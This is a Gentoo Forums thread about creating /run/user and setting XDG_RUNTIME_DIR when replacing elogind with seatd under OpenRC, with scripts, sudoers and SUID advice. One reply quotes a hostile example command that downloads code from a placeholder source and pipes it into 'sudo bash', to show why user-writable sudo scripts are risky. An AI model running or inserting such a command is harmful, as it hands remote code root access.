Gentoo Forums
Gentoo Forums
Gentoo Forums
Quick Search: in
no /run/user folder, switching from openrc elogind to seatd
View unanswered posts
View posts from last 24 hours
View posts from last 7 days

 
Reply to topic    Gentoo Forums Forum Index Desktop Environments
View previous topic :: View next topic  
Author Message
guyuming
Apprentice
Apprentice


Joined: 19 Nov 2020
Posts: 249

PostPosted: Wed May 03, 2023 1:29 pm    Post subject: no /run/user folder, switching from openrc elogind to seatd Reply with quote

i used to use openrc + elogind on my laptop.

i am trying seatd instead of elogind today.

I removed elogind USE flag from make.conf, re-emerged and started seatd according to https://wiki.gentoo.org/wiki/Seatd


but i get XDG_RUNTIME_DIR not set error when i start wayland compositor.

according to https://forums.gentoo.org/viewtopic-p-8755871.html, i need to export XDG_RUNTIME_DIR=/run/user/${id -u}

But i don't have user folder under /run.

What shall i do? create /run/user manually? what permission to set on it?
Back to top
View user's profile Send private message
GDH-gentoo
Veteran
Veteran


Joined: 20 Jul 2019
Posts: 1779
Location: South America

PostPosted: Wed May 03, 2023 3:18 pm    Post subject: Reply with quote

Have a look at this (from seatd's author).
_________________
NeddySeagoon wrote:
I'm not a witch, I'm a retired electronics engineer :)
Ionen wrote:
As a packager I just don't want things to get messier with weird build systems and multiple toolchains requirements though :)
Back to top
View user's profile Send private message
guyuming
Apprentice
Apprentice


Joined: 19 Nov 2020
Posts: 249

PostPosted: Wed May 03, 2023 11:11 pm    Post subject: Reply with quote

@GDH-gentoo, thanks! the scripts works for me and i can start my DWL wayland compositor with seatd now

UPDATE: i thought it worked. but after restarting the computer, it fails again.

when i first tried the script, i added it into /etc/profile, or ~/.profile. And in a tty, sudo su and then source /etc/profile to run the script. And then i can start wayland compositor after exit sudo.


But after restarting computer, the /run/user folder disappears, and the script don't have permission to create it, i think i have to sudo to gain the permission. But how can i do it automatically when login.


I tried the PAM_RUNDIR.so, adding it into /etc/pam.d/system-login, But i did not see /run/user created.

I am using openrc, how to check whether pam modules are called?

the s-toolbox solution link need authentication and i don't have access to it
Back to top
View user's profile Send private message
Jimmy Jazz
Guru
Guru


Joined: 04 Oct 2004
Posts: 333
Location: Strasbourg

PostPosted: Thu May 04, 2023 12:26 pm    Post subject: Reply with quote

As you I'm using seatd with XDG_RUNTIME_DIR=/home/user/tmp under Xorg but not with wayland. I don't have a /run at all. So /run/user is not mandatory.
_________________
« La seule condition au triomphe du mal, c'est l'inaction des gens de bien » E.Burke
Code:

+----+----+----+
|    |::::|    |
|    |::::|    |
+----+----+----+

motto: WeLCRO
WritE Less Code, Repeat Often
Back to top
View user's profile Send private message
guyuming
Apprentice
Apprentice


Joined: 19 Nov 2020
Posts: 249

PostPosted: Mon May 08, 2023 2:19 am    Post subject: Reply with quote

i just added sudo in front of the command, and add this ~/xdg_run_user script into the script i launch the wayland compositor with. It's ok now, just that i need to input password for sudo every time i start wayland compositor from tty.


guyuming@localhost ~/personal/gentoo $ cat ~/xdg_run_user
# Configuration because seatd does not do this for wayland compositor
YOUR_USER=$(id -u)
YOUR_GROUP=$(id -g)

XDG_RUNTIME_DIR=/run/user/$YOUR_USER

## Delete existing directory, create a new one and set permissions
sudo rm -rf $XDG_RUNTIME_DIR
sudo mkdir -p $XDG_RUNTIME_DIR
sudo chown $YOUR_USER:$YOUR_GROUP $XDG_RUNTIME_DIR
sudo chmod 700 $XDG_RUNTIME_DIR
Back to top
View user's profile Send private message
franzf
Advocate
Advocate


Joined: 29 Mar 2005
Posts: 4565

PostPosted: Mon May 08, 2023 6:14 am    Post subject: Reply with quote

guyuming wrote:
It's ok now, just that i need to input password for sudo every time i start wayland compositor from tty.

You can configure sudo to allow a user to run certain commands without having to enter a password.
Via NOPASSWD in sudoers config.
Back to top
View user's profile Send private message
sMueggli
Guru
Guru


Joined: 03 Sep 2022
Posts: 516

PostPosted: Mon May 08, 2023 9:15 am    Post subject: Reply with quote

franzf wrote:
guyuming wrote:
It's ok now, just that i need to input password for sudo every time i start wayland compositor from tty.

You can configure sudo to allow a user to run certain commands without having to enter a password.
Via NOPASSWD in sudoers config.


From a security point of view, you will make a bad situation even worse. The bad situation is, that you have a file that is writeable for the normal, unprivileged user. An attacker can therefore write his own code into the file, e.g.
Code:
wget -q -O - "$some_evil_source" | sudo bash


Currently the attacker needs to wait until the user is entering the password during system startup. If you allow certain commands to execute without password, you will give an attacker probably the possibility to get immediately priviledged access to the system.

Therefore I highly recommend to follow the guide https://git.sr.ht/~kennylevinsen/seatd-docs/tree/master/item/index.md#xdg_runtime_dir-not-set and use a script that is owned by "root:root" and writeable only for root. This script should be executed at startup before you login (OpenRC or SystemD).
Back to top
View user's profile Send private message
Hu
Administrator
Administrator


Joined: 06 Mar 2007
Posts: 22954

PostPosted: Mon May 08, 2023 2:58 pm    Post subject: Reply with quote

Recreating the directory could be done at boot via systemd-tmpfiles, but this seems like something that should be handled by the login session tracker.
Back to top
View user's profile Send private message
Anon-E-moose
Watchman
Watchman


Joined: 23 May 2008
Posts: 6188
Location: Dallas area

PostPosted: Mon May 08, 2023 4:25 pm    Post subject: Reply with quote

On my system, openrc I just create the directory in /tmp.

Code:
export XDG_RUNTIME_DIR=/tmp/.runtime-${USER}

if [[ ! -e $XDG_RUNTIME_DIR ]]
 then
  mkdir -p "${XDG_RUNTIME_DIR}"
  chmod 0700 "${XDG_RUNTIME_DIR}"
fi

_________________
UM780, 6.12 zen kernel, gcc 13, openrc, wayland
Back to top
View user's profile Send private message
guyuming
Apprentice
Apprentice


Joined: 19 Nov 2020
Posts: 249

PostPosted: Wed May 10, 2023 8:41 pm    Post subject: Reply with quote

thanks all!

@sMueggli, my script file to start wayland compositor permission is like follows, only i have write permission to this file, how can any other normal user inject script into it?

Code:

guyuming@localhost ~/rfm $ ls -l ~/dwl.sh
-rwxr-xr-x 1 guyuming guyuming 351 May  5 11:00 /home/guyuming/dwl.sh


For openrc to run the script as root to create user folder, i did some web search: my understanding is that i should create a so-called openrc service file to wrap the script inside with. I am not so familiar with the openrc service file format. Are there any way for openrc to run script directly?
Back to top
View user's profile Send private message
sMueggli
Guru
Guru


Joined: 03 Sep 2022
Posts: 516

PostPosted: Thu May 11, 2023 7:00 am    Post subject: Reply with quote

guyuming wrote:

@sMueggli, my script file to start wayland compositor permission is like follows, only i have write permission to this file, how can any other normal user inject script into it?


The attacker only needs one exploitable vulnerability to open a shell, a reverse shell or exploit a remote code execution vulnerability. Every program that you are using is a possible entry point (e.g. Firefox).

To do it with systemd-tmpfiles should be easy (except studying the manuals).
Back to top
View user's profile Send private message
guyuming
Apprentice
Apprentice


Joined: 19 Nov 2020
Posts: 249

PostPosted: Thu May 18, 2023 2:08 am    Post subject: Reply with quote

@sMueggli

but i seldom(if not never) run firefox with sudo, if some bad guy can control my firefox remotely, how can he use firefox to break the local file permission system to do something that need root?
Back to top
View user's profile Send private message
sMueggli
Guru
Guru


Joined: 03 Sep 2022
Posts: 516

PostPosted: Thu May 18, 2023 9:37 am    Post subject: Reply with quote

guyuming wrote:
@sMueggli

but i seldom(if not never) run firefox with sudo, if some bad guy can control my firefox remotely, how can he use firefox to break the local file permission system to do something that need root?


Firefox is running with the normal user privileges. And the file xdg_run_user is owned by the normal user and has the write permission for the normal user. So the attacker is able to inject "malicious" code into the file. The attacker then just needs to wait until you execute the script (and enter the password).
Back to top
View user's profile Send private message
guyuming
Apprentice
Apprentice


Joined: 19 Nov 2020
Posts: 249

PostPosted: Sat May 27, 2023 7:12 am    Post subject: Reply with quote

@sMueggli, thanks,

according to your logic, any script own by my normal user account is not safe if it contains sudo, not just the script to start wayland compositor.

what if i change the owner of the scripts (dwl.sh, the script i use to start wayland compositor, and the script xdg_run_user) to root? and give my normal user only execute permission to these scripts, will this be much safer?
Back to top
View user's profile Send private message
guyuming
Apprentice
Apprentice


Joined: 19 Nov 2020
Posts: 249

PostPosted: Sat May 27, 2023 7:34 am    Post subject: Reply with quote

@sMueggli,

I am also thinking of use SUID permission for the scripts that need to run with sudo, so i don't need to enter password anymore.

but i see talks on the web that says SUID is not safe, they recommend to use password-less sudo instead, that is, to add something as follows into /etc/sudoers, why?

Code:
normal_user ALL=(ALL) NOPASSWD:/usr/local/bin/sleep.sh
Back to top
View user's profile Send private message
sMueggli
Guru
Guru


Joined: 03 Sep 2022
Posts: 516

PostPosted: Wed May 31, 2023 8:53 am    Post subject: Reply with quote

guyuming wrote:

according to your logic, any script own by my normal user account is not safe if it contains sudo, not just the script to start wayland compositor.

Basically yes, unless you are checking every script that contains sudo prior to execute it.

guyuming wrote:

what if i change the owner of the scripts (dwl.sh, the script i use to start wayland compositor, and the script xdg_run_user) to root? and give my normal user only execute permission to these scripts, will this be much safer?


Setting up the runtime directory is something that the "root" user can do before you log in. Therefore I suggest to put the script in a place, where it belongs to root e.g. somewhere under /etc.

I do not know the dwl.sh script, so I cannot and do not want to make any recommendation. I am using Sway and I do not need any elevated privileges to start Sway.

I do not recommend the use of SUID for "private" stuff. SUID makes sense for certain binaries such as /usr/bin/passwd, but I would not use it, if there are other possibilities.
Back to top
View user's profile Send private message
Acatorn
n00b
n00b


Joined: 12 Jan 2020
Posts: 7
Location: Faerûn

PostPosted: Sat Jan 04, 2025 10:23 pm    Post subject: Reply with quote

Jimmy Jazz wrote:
As you I'm using seatd with XDG_RUNTIME_DIR=/home/user/tmp under Xorg but not with wayland. I don't have a /run at all. So /run/user is not mandatory.


I'm really, really sorry for necroposting here, but I'm very interested in this one.

Jimmy Jazz,

How did you ran Xorg using seatd? Did you use it combined with elogind? Is Xorg running as root in that setup?
Last few days I tried to run rootless Xorg (-suid) with seatd (with only these two USE flags enabled: +builtin +server) and greetd with tuigreeter and I couldn't get it to work. Standard Xorg error - parse_vt_settings cannot open /dev/tty0 permission - when I try to login.

It seems that seatd support is not implemented in upstream xorg-server (which is in official Gentoo repo) so there is no chance at all that would work. The only xorg-server patched for seatd support I found is in Devuan repo:
https://git.devuan.org/devuan/xorg-server

And heres the link for initial patch that enables seatd support in Devuan's xorg-server:
https://git.devuan.org/devuan/xorg-server/src/branch/suites/experimental/debian/patches/0001-Support-libseat.patch

Did you used that?
_________________
Take heart fellow adventurers, for you have curried the favor of Boo, the only miniature giant space hamster in the Realm!
~ Minsc, the Berserker
Back to top
View user's profile Send private message
Display posts from previous:   
Reply to topic    Gentoo Forums Forum Index Desktop Environments All times are GMT
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum